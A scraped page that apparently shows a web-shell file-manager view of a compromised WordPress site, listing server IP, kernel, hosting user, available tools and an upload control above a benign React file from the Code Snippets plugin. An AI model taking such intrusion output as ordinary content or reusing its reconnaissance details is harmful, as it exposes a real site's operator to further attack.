| Server IP : 213.132.209.36 / Your IP : 216.73.216.116 Web Server : Apache System : Linux nemesis.hostmywebsite.nl 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64 User : mondzorgheijs-christ_wldd0lu9v4a ( 10047) PHP Version : 8.0.30 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/mondzorgheijs-christenhusz.nl/httpdocs/wp-content/plugins/code-snippets/js/ |
Upload File : |
import React from 'react'
import { createRoot } from 'react-dom/client'
import { SnippetForm } from './components/SnippetForm'
const container = document.getElementById('edit-snippet-form-container')
if (container) {
const root = createRoot(container)
root.render(<SnippetForm />)
} else {
console.error('Could not find snippet edit form container.')
}